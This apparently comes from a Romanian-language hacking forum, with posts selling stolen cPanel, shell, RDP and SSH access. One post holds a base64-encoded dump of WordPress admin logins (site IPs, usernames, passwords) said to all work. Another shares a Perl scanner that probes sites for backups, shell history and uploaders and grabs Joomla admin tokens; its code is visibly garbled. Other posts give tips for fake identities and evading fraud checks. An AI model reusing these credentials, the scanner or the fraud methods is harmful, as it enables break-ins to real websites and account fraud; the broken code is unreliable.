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Dupa cum spune si titlu vand CP... ! Pretu se face in functie de cate cumperi ! Si Shell , RDP , SSH ... Mai multe daca doriti puteti sa dati PM sau ICQ/YM ...!
@Kal se vede dupa ce te uitai
Parse error: syntax error, unexpected '=', expecting ']' in /home/paragon6/public_html/xa.php on line 162 Stii sa faci si pentru alte site-uri ?! @geeko
1K Like 10$ Root 6$ /b Pentru mai multe informati , ma puteti contacta in PM sau pe YM si ICQ ! BTC/PM/WMZ
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Salut , Am Mouse + Keyboard prin USB WIFI , ambele sunt pe acelasi USB , vreu sa le conectez la un telefon LG G3S Vreu sa le folosesc pe RDP de pe telefon .. Nu stiu cum sa instalez Driver-u , cum sa il fac sa mearga , am vazut pe net ca este posibil de a conecta la un telefon Mouse + Keyboard , dar nu am gasit si cum ? Cum sa ilstalez Driver , si cum sa il fac sa functioneze ?! Are cineva idee cum as putea face ?!
@sebyy112 ne duce pe un Forum ?! Ce sa intamplat ?!
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Salut , Am un prieten care se ocupa cu Web Desing , Website ... Creaza Website de la 0 cum doresti ... Se pricepe foarte bine in acest domeniu .. Mai jos aveti cateva din proiectele lui .. Face anumite scripturi , site-uri , blog-uri , retele de socializare , forum , totu de la 0 cum doresti ! Aplicati Android si iOS Site personal : Servicii Web Design | Mobile Developkment - Flyonweb Studio Aplicatia pe Android si iOS: https://play.google.com/store/apps/details?id=com.flyonmobile.cumsescrie Cateva DEMO : 4k - Stiri Jocuri si Multe Noutati in Domeniul IT - 4kit.org vs | Live Stream | Live Matches | Live Scores Licitatii imobiliare, Vanzari imobiliare - SmartHousing.ro http://cool-tv.co //EDIT Mentionez , in momentu respectiv ma ajuta si pe mine cu un website si sunt foarte multumit de cum lucreaza .! Nu ma asteptam ! Preturile sunt acceptabile si usor negociabile !
Am luat si eu , thnx UP !
Mozello - the fastest way to create a website - WebSite Free
DQpodHRwOi8vMTk1LjI0NS4yMDUuMTkvd3AtbG9naW4ucGhwDQphc3VlZGl0b3INCmFzdWVkaXRvcg0KDQpodHRwOi8vMTk2LjQxLjEzOS4xNzcvd3AtbG9naW4ucGhwDQpqYXkNCmpheTEyMw0KDQpodHRwOi8vMjAwLjIxMC4xMDEuMTE0L3dwLWxvZ2luLnBocA0KY2FibGV0ZWNoDQpzZW5oYTEyMw0KDQpodHRwOi8vMjAwLjQ3LjE3Mi44Mi93cC1sb2dpbi5waHANCmFkbWluDQoxMjM0NTYNCg0KaHR0cDovLzY0LjI1MS4yMi43NS93cC1sb2dpbi5waHANCmFkbWluaXN0cmFkb3INCjFxMnczZTRyDQoNCmh0dHA6Ly82NC4zNC4yMTYuMTE3L3dwLWxvZ2luLnBocA0KZGVtbw0KZGVtbw0KDQpodHRwOi8vNjQuMzcuNTcuMjE5L3dwLWxvZ2luLnBocA0KY29tdW5pY2FjaW9uZXMNCmNvbXVuaWNhY2lvbmVzMTIzDQoNCmh0dHA6Ly82NC43Ni4yMDcuMTgwL3dwLWxvZ2luLnBocA0KY21vcmFndWVzDQpjbW9yYWd1ZXMNCg0KaHR0cDovLzY1LjExNy4xNDYuMTk2L3dwLWxvZ2luLnBocA0KbWNjb2xscw0KbGV0bWVpbg0KDQpodHRwOi8vNjUuMjE1LjcxLjEzMS93cC1sb2dpbi5waHANCnRnc3VzZXINCnBhc3N3b3JkDQoNCmh0dHA6Ly82Ni4yMjMuNTUuOTkvYmxvZy93cC1sb2dpbi5waHANCmR0d29tYWNrDQptZXJjZWRlcw0KDQpodHRwOi8vNzQuMjA0LjE2OC4xODYvd3AtbG9naW4ucGhwDQphZG1pbg0KYWRtaW4xMjM0NQ0KDQpodHRwOi8vNzQuMjA2LjEwMy41Ny93cC1sb2dpbi5waHANCmFzaGVzdGFrb3YNCjEyMzQ1Ng0KDQpQYXlQYWwuLi4gVmFsaWRvciENCmh0dHA6Ly90b3ByZWNpcGVzLmNvLy93cC1jb250ZW50L3RoZW1lcy90d2VudHl0d2VsdmUvNDA0LnBocA0KDQpodHRwOi8vNzcuMjM2Ljk3LjEwNi93cC1sb2dpbi5waHANCmNhc2lubw0KY2FzaW5vDQoNCmh0dHA6Ly83OC4yNS4yMTQuNDEvd3AtbG9naW4ucGhwDQphZG1pbg0KYWRtaW4xMjMNCg0KaHR0cDovLzgxLjE2OS4xNzQuMTExL2Jsb2cvd3AtbG9naW4ucGhwDQphZG1pbg0KYWRtaW4xMjMNCg0KaHR0cDovLzgyLjExMy4xNzAuMTE2L3dwLWxvZ2luLnBocA0KYWRtaW4NCmFkbWluDQoNCmh0dHA6Ly84My4xNC4zMC4xOC93cC1sb2dpbi5waHANCnNpZXJvY2thDQpzaWVyb2NrYQ== Nu vand ... Le-am gasit , merg toate ! Daca stie cineva un checker pentru WP ?!
Thnx UP , merge perfect ... !
@mannnu Da aceasi metoda , doar ca trebuie cu IP si Nr. de UK ... Merge si cu Nr. + Ip USA ... Am gasit un site unde iti poti cumpara un Nr. de USA cu PayPal .. 3$ , cine este interesat PM Merge pentru confirmare !
Nu stiu ce sa intamplat la voi dar la mine merge , mai este o metoda pe UK puteti lua free ...
Din cate am vazut eu nu poti face asta ...! Dar o sa caut mai bine si revin cu edit .!
Tutorial pentru cine inca nu sa descurcat http://youtu.be/nM8Si6_NHvo -- Check your IP address in system anti fraud detections, detecting real location -- Ip locatio -- One.com Web hosting**-**Domain • Hosting • E-mail** -- Free Domain + Host -- Receive SMS Online for FREE - UK,Romania,USA,Thailand,Spain,India -- Number Phone -- Generate a Random Name - Fake Name Generator -- fack name -- Libero --- make new email
Nu stiu exact ce face , am gasito cred ca este pentru WP - SHell #!/usr/bin/perl # scanner # (c) Humax use LWP::UserAgent; use WWW::Mechanize; use threads; $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5"); $ua->timeout(30); $defext = "php"; $| = 1; $threads = 5; head(); print "[+] Enter ip - site[(s) file] : "; $choice=<STDIN>; chomp($choice); if ($choice =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) { print " + you're entering an ip address : ".$choice."\n"; dojob($choice); } elsif($choice =~ /\.txt/) { print " + you are entering a file : ".$choice."\n"; open(sites, "<".$choice) or $!; @paths)." - not found : http://".$_[0].$_[1]."/".$filescan.".".$fext; } } } print "\n"; } sub checkcommon { print " + scanning common files \n"; @cpaths = ("validator.php","uploader.php","vbseo.php","test.txt","test.zip","public_html.zip","pulic_html.rar","public_html.tar.gz","backup.zip","backup.tar.gz",".bash_history","error_log","domlogs"); $countcp=0; foreach $filecscan (@cpaths) { chomp($filecscan); $countcp++; $scanpc = $ua->get("http://".$_[0]."/".$filecscan); if ($scanpc->status_line !~ /404/){ if ($scanpc->status_line =~ /Bad hostname\)/) { print "\t - cant connect to site\n";}else{ print "\r\t ".$countcp."/".scalar(@cpaths)." + found : http://".$_[0]."/".$filecscan." ".$scanpc->status_line."\n"; } } else{ print "\r\t ".$countcp."/".scalar(@cpaths)." - not found : http://".$_[0]."/".$filecscan; } } print "\n"; } sub getjooken { $gjotoken = WWW::Mechanize->new(); $gjotoken->get("http://".$_[0]."/administrator/index.php"); if($gjotoken->content() =~ /([0-9a-fA-F]{32})/){ print " + found token \n"; chomp($1); return $1; } else { print " - can't get token \n"; next; } } sub savefile { open (save,">>".$_[0]); print save $_[1]."\n"; close save; } sub uniq { return keys %{{ map { $_ => 1 } @_ }}; } sub head { print qq { [+] scanner [+] (c) Humax } } https://www.sendspace.com/file/1xlza6
Lucreaza bine @alezu2000 felicitari , o sa apelez la tine pentru un logo !
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Ai incercat tu sa iei cu numar de italia ? Merge , lai testat ?
@ehtishamulhaq007 24H , merge perfect